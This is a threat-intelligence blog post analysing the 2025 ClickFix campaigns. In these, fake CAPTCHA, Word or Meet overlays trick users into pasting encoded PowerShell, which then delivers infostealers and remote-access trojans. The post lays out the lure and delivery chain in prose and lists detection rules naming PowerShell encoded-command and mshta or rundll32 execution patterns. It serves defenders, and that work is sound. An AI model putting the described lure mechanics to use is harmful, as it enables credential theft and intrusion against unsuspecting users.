ClickFix: The Fake CAPTCHA Campaign That Made Users Execute Their Own Malware

Threat Intelligence

ClickFix weaponised browser-based fake CAPTCHA prompts to trick users into pasting malicious PowerShell commands into their own terminals. A 2025 campaign analysis covering the delivery chain, malware families deployed, and detection strategies.

By Arjun Raghavan, Security & Systems Lead, BIPI · August 3, 2025 · 11 min read

ClickFix is a social engineering technique, first documented at scale in late 2024 and significantly expanded through 2025, that bypasses traditional email gateway and browser security controls by outsourcing the malicious execution step to the user. The attack presents a convincing browser overlay — typically styled as a CAPTCHA verification, a Microsoft Word rendering error, or a Google Meet connectivity check — and instructs the user to open the Windows Run dialog or PowerShell and paste a command to 'fix' the problem.

The effectiveness of ClickFix stems from a simple insight: users who are trained not to open email attachments or run unsigned executables have no trained response to 'copy this command and paste it into PowerShell.' Browser security controls do not flag clipboard content. Endpoint protection tools often miss the execution because the process parent chain is legitimate.

Attack Chain Mechanics

The delivery chain typically begins with a malvertising redirect or a compromised legitimate website. The victim lands on a page that renders a full-screen overlay with professional branding. The overlay contains a 'Verify you are human' or 'Fix rendering error' prompt with a copy button. Clicking copy writes a Base64-encoded PowerShell one-liner to the clipboard. The page then displays an animation suggesting the user press Win+R, type 'powershell', paste, and press Enter.

1. Victim arrives via malvertising redirect, SEO-poisoned search result, or phishing link
2. Page renders full-screen overlay mimicking CAPTCHA, Microsoft Update, or Google Meet prompt
3. User clicks 'Fix' or 'Verify' button — clipboard is silently populated with encoded PowerShell
4. Overlay instructs user to open Run dialog (Win+R) and paste the command
5. PowerShell executes, downloads second-stage payload from a CDN or cloud storage URL
6. Second stage drops infostealer, RAT, or ransomware loader; establishes C2 persistence

Malware Families Deployed in 2025 Campaigns

Threat intelligence vendors tracked significant volume across several malware families distributed via ClickFix in 2025. LummaC2 — a commercially sold infostealer — dominated by share of infections, targeting browser credential stores, cryptocurrency wallets, and session cookies. NetSupport RAT appeared in campaigns targeting corporate networks, providing persistent remote access for follow-on hands-on-keyboard operations by initial access brokers who resell to ransomware affiliates.

• LummaC2: steals browser credentials, session cookies, crypto wallets; sold as MaaS with $250/month tiers
• StealC: lightweight credential harvester focused on password managers and email clients
• NetSupport RAT: full remote access, deployed when the initial access broker identifies a high-value corporate target
• DarkGate: multi-function loader with cryptomining, RAT, and information-stealing modules
• AsyncRAT: open-source RAT used in lower-sophistication campaigns; often combined with clipboard hijacker for crypto theft

Variants and Lure Themes

ClickFix operators iterate rapidly on lure themes. CAPTCHA variants use Cloudflare Turnstile styling with a fake verification spinner. Word and Excel variants display a message claiming the document cannot render because a font or extension is missing. Google Meet variants show a fake audio/video error with a QR code alongside the PowerShell instructions. GitHub variants impersonate repository error pages. The common thread is urgency and a plausible technical explanation that a non-technical user would accept.

Detection and Prevention

• Block PowerShell execution via mshta.exe, RunDll32, and wscript.exe process parentage in your EDR policy
• Alert on PowerShell with -EncodedCommand flag when parent process is explorer.exe or cmd.exe launched from Run dialog
• DNS sinkhole known ClickFix CDN infrastructure; threat intel feeds from Proofpoint ET and abuse.ch publish updated IOCs
• Deploy Controlled Folder Access to block credential database access by unsigned processes
• Train users specifically on the 'paste into terminal' social engineering pattern — most have never seen it
• Browser extensions that intercept clipboard-write operations can alert users when a site writes content to clipboard

Threat Actor Attribution

ClickFix is not a single threat actor — it is a technique adopted across the cybercriminal ecosystem. Initial access brokers use it to build credential inventories for sale. Ransomware affiliates use it to establish footholds in corporate networks. Nation-state adjacent groups have been observed using ClickFix lures to deploy espionage implants targeting defence contractors. The democratisation of the technique, combined with its effectiveness against standard security controls, makes it one of the defining malware delivery trends of 2025.

ClickFix is proof that the most dangerous line of code is the one the user types themselves. No malicious file, no suspicious download — just a convincingly framed social prompt that routes around every technical control.

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.